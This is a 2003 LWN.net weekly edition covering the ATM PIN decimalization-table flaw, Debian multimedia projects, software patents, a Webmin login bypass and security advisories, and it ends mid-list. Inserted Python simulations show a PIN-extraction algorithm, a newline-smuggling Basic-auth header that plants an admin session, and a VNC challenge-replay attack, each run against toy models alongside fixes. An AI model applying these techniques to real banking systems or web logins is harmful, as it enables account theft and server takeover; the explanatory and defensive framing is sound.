
LWN.net Weekly Edition for February 27, 2003

Full disclosure and the banking industry

Back in 1992, an English police officer named John Munden returned from a vacation to find that a series of ATM withdrawals had cleaned out his bank account. His complaints to the bank were not received well; they responded that their systems were secure and only Mr. Munden could have made those withdrawals. When he persisted, the bank (the Halifax Building Society) had him prosecuted (and convicted) for fraud. It took four years, and a great deal of effort by a researcher named Ross Anderson, to shine a light on Halifax's poor security, and to get Mr. Munden freed on appeal. Even so, the attitude of the banking industry has changed little; complaints of "phantom withdrawals" are given little credence, and account holders often end up footing the bill. (Some countries, including the U.S., give consumers more protection than others, such as Britain, in this area).

Given that people's money - and freedom - are being staked on the security of the ATM system, it would be nice to know that this system is truly secure. But banks, unsurprisingly, are unenthusiastic about opening up their systems to external review. Mr. Anderson and colleagues have continued their research into the phantom withdrawal problem, and have served as expert witnesses in associated court cases. Recently they turned up something interesting.

The personal ID numbers (PINs) used to verify the person using an ATM card are kept in a carefully-guarded database. It is not generally possible to extract a specific PIN directly. Instead, the ATM system operates through a set of hardware security modules that can give "yes or no" answers for a given account number and PIN. Thus, it is claimed, even a corrupt insider would be reduced to guessing to obtain a specific PIN number. The search space is not that large (10,000 numbers), but it still requires an average of 5,000 guesses to obtain a single PIN.

Mike Bond and Piotr Zielinski, working with Mr. Anderson, found a vulnerability in this system; their writeup is available (for now) on the web in PDF format (also available here while Cryptome, which apparently has been broken into, gets back on its feet). By manipulating a simple "decimalization table" used in the generation of the PIN from the account number, an attacker can quickly determine which digits are present in the PIN. Using that information and some additional tricks, the researchers were able to extract PIN numbers using an average of 15 guesses. An attacker, they conclude, would be able to extract about 7,000 PINs over the course of a half-hour lunch break.
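To make the decimalization-table attack concrete, here is a simulation of an IBM 3624-style verification oracle together with the attacker's query strategy. This is an added example, not code from the paper, from any bank or from any HSM vendor: the key, the PAN, the offset and the oracle's interface are constructed for the demonstration, and HMAC-SHA256 stands in for the DES encryption of the account number (an assumption that does not change the attack, since all the attacker ever uses is the oracle's yes/no answer). The point it shows is that letting the caller supply the decimalization table turns a 10,000-way guessing game into a couple of dozen queries.

```python
"""Decimalization-table attack on an IBM 3624-style PIN verifier (constructed
simulation of the Bond/Zielinski technique; not any bank's or vendor's code)."""
import hashlib
import hmac
from itertools import combinations

STANDARD_DECTAB = "0123456789012345"   # maps hex digit 0-F to a decimal digit


def add_offset(natural: str, offset: str) -> str:
    """Customer PIN = natural PIN + offset, digit-wise modulo 10."""
    return "".join(str((int(a) + int(b)) % 10) for a, b in zip(natural, offset))


class ToyHsm:
    """Verification oracle: only yes/no answers, the PIN never leaves the box.

    The real scheme takes the first four hex digits of DES_k(PAN); HMAC-SHA256
    under a constructed key stands in for DES here (assumption)."""

    def __init__(self, pin_derivation_key: bytes):
        self._pdk = pin_derivation_key
        self.queries = 0

    def _hex_digits(self, pan: str) -> str:
        return hmac.new(self._pdk, pan.encode(), hashlib.sha256).hexdigest()[:4]

    def _natural_pin(self, pan: str, dectab: str) -> str:
        return "".join(dectab[int(h, 16)] for h in self._hex_digits(pan))

    def issue_pin(self, pan: str, offset: str) -> str:
        """What the PIN mailer gets at enrolment (bank-internal use only)."""
        return add_offset(self._natural_pin(pan, STANDARD_DECTAB), offset)

    def verify(self, pan: str, dectab: str, offset: str, trial_pin: str) -> bool:
        """The call an insider can make: is trial_pin the PIN for this PAN?
        The caller supplies the decimalization table, which is the flaw."""
        self.queries += 1
        return add_offset(self._natural_pin(pan, dectab), offset) == trial_pin


def digit_mask_table(digit: int) -> str:
    """Table mapping to 1 where the standard table has `digit`, else 0, so
    the natural PIN comes out as a bit-mask of that digit's positions."""
    return "".join("1" if d == str(digit) else "0" for d in STANDARD_DECTAB)


def mask_pin(positions) -> str:
    return "".join("1" if i in positions else "0" for i in range(4))


def crack_natural_pin(hsm: ToyHsm, pan: str) -> str:
    # Phase 1: which decimal digits occur?  Under digit_mask_table(d) the
    # natural PIN is 0000 exactly when d is absent: ten queries, no guessing.
    present = [d for d in range(10)
               if not hsm.verify(pan, digit_mask_table(d), "0000", "0000")]

    # Phase 2: where does each present digit sit?  Trial PINs are bit-masks
    # over the still-unassigned positions; the last digit takes what is left.
    pin = [None] * 4
    unassigned = set(range(4))
    for idx, d in enumerate(present):
        others_left = len(present) - idx - 1
        chosen = None
        if others_left == 0:
            chosen = set(unassigned)
        else:
            # every other present digit still needs at least one position
            for size in range(1, len(unassigned) - others_left + 1):
                for cand in combinations(sorted(unassigned), size):
                    if hsm.verify(pan, digit_mask_table(d), "0000", mask_pin(cand)):
                        chosen = set(cand)
                        break
                if chosen is not None:
                    break
        assert chosen is not None
        for p in chosen:
            pin[p] = str(d)
        unassigned -= chosen
    return "".join(pin)


def demo(pan: str = "4000123456789010", offset: str = "2917"):
    """One run: returns (recovered customer PIN, oracle queries used, true PIN)."""
    hsm = ToyHsm(b"constructed PIN derivation key")
    true_pin = hsm.issue_pin(pan, offset)
    natural = crack_natural_pin(hsm, pan)
    # the offset is stored in the clear (on the card or in the database)
    return add_offset(natural, offset), hsm.queries, true_pin


if __name__ == "__main__":
    recovered, queries, true_pin = demo()
    print(f"recovered {recovered} (true {true_pin}) in {queries} oracle queries")
```

This straightforward version never needs more than 24 oracle calls (ten of them are the presence test alone); the paper's adaptive refinements bring the average down to the 15 quoted above. The defensive lesson is the same either way: a verification API that accepts an attacker-chosen table, or that does not cryptographically bind the table to the key, leaks the PIN one bit at a time.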

Citibank has responded to this discovery by seeking a gag order to suppress the disclosure of the vulnerability information. The information, says Citibank, is confidential and should not be released publicly. This action immediately had the obvious effect: once word got out, the paper describing the vulnerability was copied far and wide across the net, beyond any feasible recall. Even in the modern world, once information gets out, it is out.

Citibank could certainly argue that it does not want to provide useful information to those who would attack its systems. On the other hand, the rising tide of phantom withdrawal cases suggests that some of this information is in the hands of the Bad Guys already. Could it be that the banks are really trying to avoid (1) admitting that phantom withdrawals are a real problem, and (2) undertaking the expensive task of fixing their systems?

Evidence in the software field consistently suggests that vendors do not rush out to fix their security problems in the absence of considerable external pressure to do so. This is especially true if the costs of the problems can be pushed onto somebody else. The banking industry needs disclosure of its problems if we are to have any confidence in its security at all. As with vulnerabilities in the software industry, banking vulnerabilities should be handled with some care. But the information has to get out, or the problems will not be fixed in any sort of timely way. Consider, for example, the uproar that resulted when Matt Blaze exposed a vulnerability in master-keyed door locks which, apparently, had been known to locksmiths (but not fixed) for decades.

The lessons we have learned in the software world are applicable in a much wider context. Continued defense of our ways of working, including disclosure of security problems and open review of security-related systems, is important for our security and freedom. This is true with regard to our computing systems, and far beyond.


The State of Multimedia Linux

[This article was contributed by Joe 'Zonker' Brockmeier]

About three years ago a volunteer project, sparked by Marco Trevisani, started working on DeMuDi (the Debian Multimedia Distribution). The goal of DeMuDi was to provide a multimedia GNU/Linux distribution. Not just a distribution with multimedia players and viewers, but a distribution with tools to author multimedia content. Originally devised for distribution at the International Computer Music Conference, the project took on a life of its own after that conference.

According to Guenter Geiger, one of the developers who worked on the original DeMuDi project and who has been one of the main volunteers until recently, the project sparked the AGNULA (A GNU/Linux Audio distribution) project. (Note: The availability of the AGNULA website leaves much to be desired. It may be easier to get information on AGNULA using Google's caching feature.) The AGNULA project was started by Nicola Bernardini. Bernardini, the manager of Centro Tempo Reale in Florence, delivered a proposal to the European Commission. The EC gave a green light to the project, and provided a two-year funding package starting April 1, 2002.

The AGNULA project is coordinated by Tempo Reale and involves research institutions in Paris, Barcelona, Stockholm and the Free Software Foundation Europe. The goal of the project is to produce two distributions, DeMuDi and a Red Hat-based version called ReHMuDi, as well as a number of multimedia packages. Only free software is to be used to build these distributions.

Unfortunately, development of the distributions under the AGNULA project does not seem to be proceeding quite as quickly as some might have hoped. Trevisani, who was the Technical Coordinator for the AGNULA/DeMuDi project, spoke up a few weeks ago on the Debian developer media list about the problems with DeMuDi as a separate distribution and the need for an internal Debian multimedia project:

After one year of work and having reached release 0.9 I definitely think that it is time to start a Debian-Multimedia internal project...I'm aware that there is no chance for the project for growing and lasting in the future if it does not become quite urgently a Debian internal project.

Trevisani has stepped down from his position as Technical Coordinator for the project after one year of work and the release of DeMuDi 0.9. The position is now being handled by Andrea Glorioso. Glorioso also took part in the discussion on the Debian developer mailing list, and says that they're trying to find a good way to cooperate between the AGNULA project and Debian. However, there are some technical hurdles in coordinating packages with Debian, since the stable distribution moves very slowly and the testing and unstable distributions are (by definition) always in a state of flux.

Geiger has also stopped working on DeMuDi and says that he wants to "concentrate more on pushing the idea within Debian, simply by maintaining the DeMuDi packages within the Debian framework." Geiger says that the main problem with DeMuDi is a lack of developers. A glance at the DeMuDi developer mailing list archives shows that there's not a lot of activity on that front.

While some developers are being paid for work related to Linux multimedia, Geiger says there is little money for creating the distribution itself. According to Geiger, "the big part of the money is going into the subprojects...the small part that is left for building the two distributions is divided equally among DeMuDi and ReHMuDi." Both Geiger and Trevisani have worked on DeMuDi as volunteers.

For now, Geiger says that he hopes there will be more discussion within Debian about an internal multimedia project. He also mentioned that a separate mailing list for discussion of a multimedia project has been requested. As of yet, there's no official word on the status of an internal Debian project.

Whether the AGNULA projects will result in a usable multimedia distribution, or if Trevisani and Geiger will be successful in producing a viable sub-project within Debian, remains to be seen. If Linux is going to make any kind of dent in Microsoft's share on the desktop, we'll definitely need multimedia applications that can compete with the commercial counterparts for Windows and the Mac OS. There are a number of applications that are showing promise, but a distribution that bundles the applications could be a huge boon in luring users away from proprietary platforms and onto Linux.


Continuing fun with software patents

The U.S. Patent and Trademark Office continues to amaze with the range of software technologies that it is willing to patent. Here are a couple of new ones:
  • Interwoven has been awarded patent #6,505,212 for a "system and method for website development." What the patent really covers, though, is a revision control system; the management of web site content is just one possible use suggested in the patent abstract. This patent covers content management systems like Zope quite clearly; revision control systems like CVS could also be threatened, however. (See also: Interwoven's press release on the patent).

  • Amazon, meanwhile, was just given patent #6,525,747, which covers online discussion systems. This patent would appear to cover just about any site which allows the posting of comments. It might be limited somewhat, however, by its reference to "items offered for sale" as the starting point for discussions.

There is no doubt that copious amounts of prior art can be found for both of these patents. Your editor first used a revision control system - accessed with punch cards - over twenty years ago. Web sites allowing discussions existed before Amazon hit the net, and certainly before 1999, when the patent was filed.

But prior art does not help address the real problem: the patent office is allowing companies to try to fence off little bits of the intellectual landscape without regard to originality or any pretense of promoting any sort of progress. Increasingly, it is impossible to write any sort of nontrivial program that does not infringe upon somebody's patent. The only saving grace is the fact that most of these patents are never enforced. Otherwise, software development would grind to a halt - at least, in those countries which allow software patents.


LWN Update

It's been a little while since we have posted one of these updates. That is as it should be...better to fill our pages with the stuff you all really came to read. We'll let you get into this week's hot security updates shortly, but, first, a word from your sponsor.

The individual subscription count stands at almost exactly 2500; it really has not changed much in the last couple months. 2500 subscribers will keep the lights on for now, but that's really not enough to keep things going in the long term. Somehow we are going to have to find a way to inspire quite a few more of you to subscribe.

That said, here's a quick heads up: we'll be making a small change to subscription pricing shortly. Until now, we have encouraged readers to take out monthly subscriptions for a couple of reasons: we didn't want to risk going under with a large unfulfilled subscription liability, and we were doing our best to avoid getting in trouble with our credit card merchant bank. At this point, we are reasonably confident that we'll figure this out somehow and find a way to stick around for the long term. And our new merchant bank is rather more friendly than the old one was. The monthly renewals are also costing us a fair amount in processing fees.

So we will soon (within a week or two) implement a discount for longer-term subscriptions. It won't be huge, but it will reflect the difference in our costs, and, hopefully, encourage a shift away from the monthly method. An announcement will go out when the new scheme goes into effect.

Thanks, as always, for supporting LWN.


Page editor: Jonathan Corbet

Security

Security news

Giving Root to the Web

[This article was contributed by Tom Owen]

These days, pretty much any box with an Ethernet port has a web administration interface running alongside the command line and that iffy SNMP agent. Even if you can ignore horrors like the admin password going through an HTML form and no support for HTTPS, it's unlikely that the web server running in, say, a cheap switch will have been better tested or reviewed than miniserv.pl, the perl HTTP server which runs at the core of Webmin.

Webmin is a popular administration package which provides form-based access to configuration files for many standard and optional components. Administrators use a browser and the Webmin forms to manage users, DNS zone changes, driver modules and many other tasks. All the applications are perl modules, running via CGI under the miniserv.pl web server.

The recent vulnerability report from the LAC security lab suggests that miniserv.pl can be fooled by control characters in a web authentication string. It apparently needs the "Enable Password Timeout" option to be set in Webmin, but that's an option that many cautious admins will choose anyway. The inevitable exploit makes it concrete and easy. It's nicely set up to get a script kiddy going: a few lines of perl run netcat to fake a single HTTP GET. It's all simple and transparent except for an artfully crafted base64 string on the Authorization: header. The control codes there create a specific session for the default user "admin". A cookie containing the session ID on a local browser is then all the attacker needs to use all the Webmin modules. It's complete server root access with full havoc potential in a very few steps.
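The shape of that bug, a decoded credential that still carries control characters and is then handed to a privileged component that speaks a line-oriented protocol, is modelled below. This is an added example and not miniserv.pl's code or the published exploit: the "session daemon", its command format and the session IDs are constructed stand-ins, and only the class of mistake (and the check that prevents it) is the same. It shows the vulnerable login path next to a hardened one that rejects the crafted header before it reaches anything privileged.

```python
"""Control characters in HTTP Basic credentials: a constructed model of the
bug class, not miniserv.pl's code.  The 'session daemon' below stands in for
any privileged helper that is driven over a newline-delimited channel."""
import base64
import re

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def decode_basic(header_value: str):
    """Parse 'Authorization: Basic <b64>' into (user, password), unchecked."""
    scheme, _, blob = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not HTTP Basic authentication")
    raw = base64.b64decode(blob, validate=True).decode("latin-1")
    user, sep, password = raw.partition(":")
    if not sep:
        raise ValueError("credential lacks ':' separator")
    return user, password


class SessionDaemon:
    """Privileged side.  Reads one command per line:
         login <sid> <user> <password>   verify, then bind sid to user
         new <sid> <user>                bind without a password (meant to be
                                         reachable only from trusted code)"""

    def __init__(self, passwords: dict):
        self._passwords = passwords
        self.sessions = {}          # session id -> user

    def handle(self, text: str) -> None:
        for line in text.split("\n"):
            cmd, *args = line.split(" ")
            if cmd == "login" and len(args) == 3:
                sid, user, password = args
                if self._passwords.get(user) == password:
                    self.sessions[sid] = user
            elif cmd == "new" and len(args) == 2:
                sid, user = args
                self.sessions[sid] = user


def login_vulnerable(daemon: SessionDaemon, header_value: str, sid: str) -> None:
    """Passes the decoded credential straight into the command channel."""
    user, password = decode_basic(header_value)
    daemon.handle(f"login {sid} {user} {password}")


def login_hardened(daemon: SessionDaemon, header_value: str, sid: str) -> None:
    """Same flow, but a credential containing control characters or the
    channel's own delimiters is rejected before it reaches the daemon."""
    user, password = decode_basic(header_value)
    for field in (user, password):
        if CONTROL_CHARS.search(field) or " " in field:
            raise ValueError("credential contains forbidden characters")
    daemon.handle(f"login {sid} {user} {password}")


def crafted_header(planted_sid: str) -> str:
    """Constructed attacker header: a wrong password for 'admin' followed by a
    newline and a second command that plants a session for admin."""
    cred = f"admin:wrong\nnew {planted_sid} admin"
    return "Basic " + base64.b64encode(cred.encode()).decode()


def run(login_fn) -> dict:
    """Drive one login function with the crafted header; return the session table."""
    daemon = SessionDaemon({"admin": "correct-horse"})
    try:
        login_fn(daemon, crafted_header("1234"), "9999")
    except ValueError:
        pass
    return dict(daemon.sessions)


if __name__ == "__main__":
    print("vulnerable:", run(login_vulnerable))   # attacker holds session 1234 as admin
    print("hardened:  ", run(login_hardened))     # nothing
```

Two things carry over to real code: base64 is an encoding, not a filter, so whatever comes out of the decoder needs the same validation as any other untrusted input; and the check belongs at the boundary where the string changes meaning (here, from a credential to a line on a command channel), not only at the HTTP parser.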

A search for "webmin" on Bugtraq shows a trickle of problems, mostly in the last couple of years, ranging from local privilege escalation to full remote admin access. Cross site scripting and other old favorites show up with oddities like leftover environment variables. In fact the system seems more secure than many, but the consequences of failure are much worse than for ordinary web applications: instead of one function or application being compromised, it's the whole server. This situation raises a question: Can it ever be responsible to put a root function on to a web protocol?

This isn't particularly a Webmin issue. The miniserv.pl fault was promptly fixed in 1.070 but all of those cheap printers, switches and wireless access points are still booting the firmware they shipped with. We can be sure that this is a case where absence of reports doesn't mean the holes aren't there. Despite the potential for trouble, no reduction in web-based administration, even over the public internet, is going to happen soon. It probably won't even begin to happen until someone gets sued for negligence -- it's just too useful, and for remotely-hosted servers it's pretty much essential.

Just looking at Webmin, the value stands out:

  • So many people hate text mode configuration
  • Even those who love it acknowledge that systems like Bind are ticklish to get right by hand: A display like this is not lovely, but it can save you from forgetting the reverse addresses.
  • Checklist purchasers need it: it's a good, demonstrable counterargument to "Linux is impossible to administer" charges.
So, lots of admins will be keeping Webmin, SWAT and those network boxes. They've got a lot of the same work to do:
  • Turn off unused web administrator systems (and SNMP too.) Scan to make sure they stay off.
  • When it's configurable, standardise on a web administration port to block unconditionally at the firewall. Caldera, for example, uses port 1000.
  • Printers and switches don't need Internet access. At the firewall, block the IP range they're in.
  • In simple LANs they don't even need a default gateway. 0.0.0.0 is fine.
  • Webmin and others offer IP-based access control. Turn it on and only include administrators' machines.
  • In the longer term, get that VPN on-line.
It's a shame. That fantasy about doing your work from the Internet cafe just ended. Web administration is democratic, convenient and inclusive, a huge boon to admins, and it'll be hard to give it up. But the way it looks now, it's hard to believe it can ever be really safe.


New vulnerabilities

apcupsd - remote root vulnerability and buffer overflows

Package(s):apcupsd CVE #(s):CAN-2003-0098 CAN-2003-0099
Created:February 24, 2003 Updated:April 3, 2003
Description: From the MandrakeSoft advisory:

A remote root vulnerability in slave setups and some buffer overflows in the network information server code were discovered by the apcupsd developers. They have been fixed in the latest unstable version, 3.10.5 which contains additional enhancements like USB support, and the latest stable version, 3.8.6.

There are a few changes that need to be noted, such as the port has changed from port 7000 to port 3551 for NIS, and the new config only allows access from the localhost. Users may need to modify their configuration files appropriately, depending upon their configuration.

Alerts:
Debian DSA-277-1 2003-04-03
SuSE SuSE-SA:2003:022 2003-03-26
SCO Group CSSA-2003-015.0 2003-03-25
Mandrake MDKSA-2003:018 2003-02-18
Gentoo 200302-13 2003-02-24


BitchX - denial of service

Package(s):BitchX CVE #(s):
Created:February 20, 2003 Updated:May 26, 2003
Description: From this Bugtraq posting:

A denial of service vulnerability exists in BitchX. Sending a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault. This problem was reported to panasync@efnet#bitchx on Jan 30 2003, as of this writing we are unaware of any patches or workarounds provided by panasync and or any members of #bitchx

Alerts:
Conectiva CLA-2003:655 2003-05-26
Slackware ssa:2003-141-02 2003-05-22
Debian DSA-306-1 2003-05-19
Gentoo 200302-11 2003-02-20


shadow-utils: useradd tool creates mail spools with incorrect permissions

Package(s):shadow-utils CVE #(s):CAN-2002-1509
Created:February 20, 2003 Updated:February 27, 2003
Description: The shadow-utils package includes programs for converting UNIX password files to the shadow password format, plus programs for managing user and group accounts. One of these programs is useradd, which is used to create or update new user information.

When creating a user account, the version of useradd included in Red Hat Linux 7.2, 7.3, and 8.0 creates a mailbox file with incorrectly-set group ownership. Instead of setting the file's group ownership to the 'mail' group, it is set to the user's primary group.

On systems where other users share the same primary group, this would allow those users to be able to read and write other user mailboxes.

Alerts:
Mandrake MDKSA-2003:026 2003-02-26
Red Hat RHSA-2003:057-06 2003-02-18


usermin - unauthorized access

Package(s):usermin, webmin CVE #(s):
Created:February 24, 2003 Updated:February 27, 2003
Description: - From announcement:

"Due to a remotely exploitable security hole being discovered that affects all previous Webmin releases, version 1.070 is now available for download from http://www.webmin.com/ and mirror sites. This problem was reported by Cintia M. Imanishi, but fortunately there have been no known malicious exploits of it yet. However, all users should upgrade to 1.070 as soon as possible."

"Also available is Usermin 1.000 which fixes the exact same security hole. It includes the same File Manager features, as well as support for IMAP folders and an IMAP inbox in the Read Mail module."

Read this alert for the details.

Alerts:
Mandrake MDKSA-2003:025 2003-02-26
EnGarde ESA-20030225-006 2003-02-25
Gentoo 200302-14 2003-02-24
Gentoo 200302-12 2003-02-22


vnc - replay and cookie vulnerabilities

Package(s):vnc CVE #(s):CAN-2002-1336 CAN-2002-1511
Created:February 21, 2003 Updated:May 5, 2003
Description: VNC is a tool for providing a remote graphical user interface. Two vulnerabilities have been found in versions of VNC shipped by Red Hat.

The VNC server acts as an X server, but the script for starting it generates an MIT X cookie (which is used for X authentication) without using a strong enough random number generator. This could allow an attacker to be able to more easily guess the authentication cookie.

The VNC DES authentication scheme is implemented using a challenge-response architecture, producing a random and different challenge for each authentication attempt. A bug in the function for generating the random challenge caused the random seed to get reset to the current time on every authentication attempt. Therefore, two authentication attempts within the same second could receive the same challenge. An eavesdropper could exploit this vulnerability by replaying the response, thereby gaining authentication.

All users of VNC are advised to upgrade to these erratum packages, which contain patches to correct these issues.
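The challenge reuse is easy to see in a small model. The following is an added example, not VNC's code or Red Hat's patch: the server hands out its challenge either from a generator reseeded with the wall-clock second on every attempt (the bug described above) or from the operating system's entropy source (the fix), and the eavesdropper simply connects within the same second and replays the response it recorded. HMAC-SHA256 stands in for VNC's DES-based response computation, an assumption that does not affect the point, and the frozen clock is a test convenience standing in for "two attempts in the same second".

```python
"""Replay against a challenge-response login whose challenge generator is
reseeded from the clock on every attempt.  Constructed model of the VNC
bug; not the VNC code.  HMAC-SHA256 stands in for VNC's DES response."""
import hashlib
import hmac
import random
import secrets


def compute_response(password: str, challenge: bytes) -> bytes:
    """Client side: prove knowledge of the password for this challenge."""
    return hmac.new(password.encode(), challenge, hashlib.sha256).digest()[:16]


class VncLikeServer:
    def __init__(self, password: str, clock, reseed_each_attempt: bool):
        self._password = password
        self._clock = clock                    # callable returning seconds as float
        self._buggy = reseed_each_attempt

    def new_challenge(self) -> bytes:
        if self._buggy:
            # The bug: seed reset to the current time on every attempt, so two
            # attempts within one second receive the same "random" challenge.
            rng = random.Random(int(self._clock()))
            return rng.getrandbits(128).to_bytes(16, "big")
        # The fix: a challenge from the OS entropy source, never reseeded.
        return secrets.token_bytes(16)

    def authenticate(self, challenge: bytes, response: bytes) -> bool:
        expected = compute_response(self._password, challenge)
        return hmac.compare_digest(expected, response)


def replay_attack(server: VncLikeServer, password: str) -> bool:
    """Eavesdropper records one legitimate exchange, then immediately tries to
    log in with the recorded response.  Returns True if the replay is accepted."""
    # 1. a legitimate client logs in; the attacker sees (challenge, response)
    seen_challenge = server.new_challenge()
    seen_response = compute_response(password, seen_challenge)
    assert server.authenticate(seen_challenge, seen_response)
    # 2. the attacker connects within the same second and is issued a challenge
    attacker_challenge = server.new_challenge()
    # 3. the attacker answers with the recorded response, knowing no password
    return server.authenticate(attacker_challenge, seen_response)


def frozen_clock(t: float):
    """Constructed clock that never advances: models two attempts in one second."""
    return lambda: t


if __name__ == "__main__":
    clock = frozen_clock(1046300000.0)
    print("buggy server, replay accepted:",
          replay_attack(VncLikeServer("s3cret", clock, reseed_each_attempt=True), "s3cret"))
    print("fixed server, replay accepted:",
          replay_attack(VncLikeServer("s3cret", clock, reseed_each_attempt=False), "s3cret"))
```

The MIT-MAGIC-COOKIE problem in the same advisory is the same mistake one layer down: a secret derived from a predictable seed is guessable no matter how good the protocol around it is. For anything that must be unpredictable (challenges, cookies, session IDs) draw from the system's entropy source, and never reseed a generator from the clock per request.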

Alerts:
Conectiva CLA-2003:640 2003-05-05
Mandrake MDKSA-2003:022 2003-02-24
Gentoo 200302-16 2003-02-24
Gentoo 200302-15 2003-02-24
Red Hat RHSA-2003:041-12 2003-02-20


zlib 1.1.4 has buffer overrun

Package(s):zlib CVE #(s):CAN-2003-0107
Created:February 25, 2003 Updated:April 29, 2003
Description: From this Bugtraq posting: "zlib contains a function called gzprintf(). This is similar in behaviour to fprintf() except that by default, this function will smash the stack if called with arguments that expand to more than Z_PRINTF_BUFSIZE (=4096 by default) bytes."
Alerts:
Red Hat RHSA-2003:079-01 2003-04-29
Conectiva CLA-2003:619 2003-04-07
Gentoo 200303-25 2003-03-28
Mandrake MDKSA-2003:033 2003-03-18
SCO Group CSSA-2003-011.0 2003-03-10
OpenPKG OpenPKG-SA-2003.015 2003-03-04
Sorcerer SORCERER2003-08-25 2003-02-25


Updated vulnerabilities

Heap corruption vulnerability in at

Package(s):at, sudo, xchat CVE #(s):CAN-2002-0004
Created:May 20, 2002 Updated:May 15, 2003
Description: The at command has a potentially exploitable heap corruption bug. (First LWN report:  January 17th).
Alerts:
EnGarde ESA-20030515-015 2003-05-15
Yellow Dog YDU-20020127-9 2002-01-27
SuSE SuSE-SA:2002:003 2002-01-16
Slackware sl-1011706104 2002-01-22
Red Hat RHSA-2002:015-15 2002-02-07
Red Hat RHSA-2002:015-13 2002-01-22
Mandrake MDKSA-2002:007 2002-01-18
Debian DSA-102-2 2002-01-18
Debian DSA-102-1 2002-01-16


BIND8: Multiple vulnerabilities

Package(s):bind CVE #(s):CAN-2002-1219 CAN-2002-1220 CAN-2002-1221
Created:November 13, 2002 Updated:March 6, 2003
Description: Three new vulnerabilities have been found in version 8 of the Berkeley Internet Name Domain (BIND) server; see this ISS advisory, the CERT Advisory CA-2002-31, or the November 14 LWN Security Page for details.

Red Hat has sent out an alert (not a regular advisory) suggesting that customers apply its previous BIND updates, which upgrade the system to BIND9.

Alerts:
Sorcerer SORCERER2003-03-06 2003-03-06
SCO Group CSSA-2002-059.0 2002-12-19
Trustix 2002-0076 2002-11-15
OpenPKG OpenPKG-SA-2002.011 2002-11-15
Debian DSA-196-1 2002-11-14
Conectiva CLA-2002:546 2002-11-14
Mandrake MDKSA-2002:077 2002-11-14
SuSE SuSE-SA:2002:044 2002-11-13
EnGarde ESA-20021114-029 2002-11-14


bind buffer overflow vulnerability in DNS resolver libraries

Package(s):bind glibc CVE #(s):CAN-2002-0651 CAN-2002-0684
Created:July 8, 2002 Updated:September 30, 2003
Description: The BIND 4.9.8-OW2 patch and BIND 4.9.9 release (and thus 4.9.9-OW1) include fixes for a libc related vulnerability which does not affect Linux. Updates from the Internet Software Consortium (ISC) are available from here.

No release or branch of Openwall GNU/*/Linux (Owl) is known to be affected, due to Olaf Kirch's fixes for this problem getting into the GNU C library more than two years ago.

Unfortunately that does not mean that Linux systems are not vulnerable. Similar code, without Olaf Kirch's fixes, is in the glibc getnetbyXXX functions. These functions are described in the SuSE alert as "used by very few applications only, such as ifconfig and ifuser, which makes exploits less likely."

CERT Advisory: CA-2002-19 Buffer Overflow in Multiple DNS Resolver Libraries

CAN-2002-0651
CAN-2002-0684

Alerts:
Mandrake MDKSA-2002:050 2002-08-13
Yellow Dog YDU-20020810-3 2002-08-10
Eridani ERISA-2002:035 2002-08-09
Red Hat RHSA-2002:133-13 2002-08-08
SCO Group CSSA-2002-034.0 2002-08-05
Yellow Dog YDU-20020801-2 2002-08-01
Eridani ERISA-2002:028 2002-07-25
Red Hat RHSA-2002:139-10 2002-07-22
EnGarde ESA-20020724-018 2002-07-24
Mandrake MDKSA-2002:043 2002-07-16
Trustix 2002-0061 2002-07-15
Gentoo glibc-20020713 2002-07-13
Conectiva CLA-2002:507 2002-07-11
SuSE SuSE-SA:2002:026 2002-07-09
OpenPKG OpenPKG-SA-2002.006 2002-07-04


Canna server: exploitable buffer overrun

Package(s):canna CVE #(s):CAN-2002-1158 CAN-2002-1159
Created:December 10, 2002 Updated:September 30, 2003
Description: Canna is a kana-kanji conversion server which is necessary for Japanese language character input.

A buffer overflow bug in the Canna server up to and including version 3.5b2 allows a local user to gain the privileges of the user 'bin' which could lead to further exploits. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-1158 to this issue.

A lack of validation of requests has been found that affects Canna version 3.6 and earlier. A malicious remote user could exploit this vulnerability to leak information, or cause a denial of service attack. (CAN-2002-1159)

See also http://canna.sourceforge.jp/sec/Canna-2002-01.txt

CAN-2002-1158
CAN-2002-1159

Alerts:
SCO Group CSSA-2003-005.0 2003-01-21
Debian DSA-224-1 2003-01-08
Gentoo 200212-8 2002-12-20
Red Hat RHSA-2002:246-18 2002-12-04


CVS - exploitable double-free bug in the CVS server

Package(s):cvs CVE #(s):CAN-2003-0015
Created:January 20, 2003 Updated:April 7, 2003
Description: CVS is a version control system frequently used to manage source code repositories. During an audit of the CVS sources, Stefan Esser discovered an exploitable double-free bug in the CVS server.

On servers which are configured to allow anonymous read-only access, this bug could be used by anonymous users to gain write privileges. Users with CVS write privileges can then use the Update-prog and Checkin-prog features to execute arbitrary commands on the server.

All users of CVS are advised to upgrade to erratum packages which contain patches to correct the double-free bug.

See also this CERT advisory

Alerts:
Immunix IMNX-2003-7+-004-01 2003-04-02
SCO Group CSSA-2003-006.0 2003-01-31
Yellow Dog YDU-20030127-6 2003-01-27
Conectiva CLA-2003:561 2003-01-23
SuSE SuSE-SA:2003:0007 2003-01-22
Slackware sl-1043242333 2003-01-22
Conectiva CLA-2003:560 2003-01-21
Debian DSA-233-1 2003-01-21
Gentoo 200301-12 2003-01-21
OpenPKG OpenPKG-SA-2003.004 2003-01-21
Mandrake MDKSA-2003:009 2003-01-20
Red Hat RHSA-2003:012-07 2003-01-20


dhcp3 - ignored counter boundary

Package(s):dhcp3 CVE #(s):CAN-2003-0039
Created:January 28, 2003 Updated:April 4, 2003
Description: Florian Lohoff discovered a bug in the dhcrelay causing it to send a continuing packet storm towards the configured DHCP server(s) in case of a malicious BOOTP packet, such as sent from buggy Cisco switches.

When the dhcp-relay receives a BOOTP request it forwards the request to the DHCP server using the broadcast MAC address ff:ff:ff:ff:ff:ff which causes the network interface to reflect the packet back into the socket. To prevent loops the dhcrelay checks whether the relay-address is its own, in which case the packet would be dropped. In combination with a missing upper boundary for the hop counter an attacker can force the dhcp-relay to send a continuing packet storm towards the configured dhcp server(s).

This patch introduces a new commandline switch ``-c maxcount'' and people are advised to start the dhcp-relay with ``dhcrelay -c 10'' or a smaller number, which will only create that many packets.

The dhcrelay program from the ``dhcp'' package does not seem to be affected since DHCP packets are dropped if they were apparently relayed already.

Alerts:
Conectiva CLA-2003:616 2003-04-04
Red Hat RHSA-2003:034-01 2003-03-31
OpenPKG OpenPKG-SA-2003.012 2003-02-19
Debian DSA-245-1 2003-01-28


dvips: command execution vulnerability

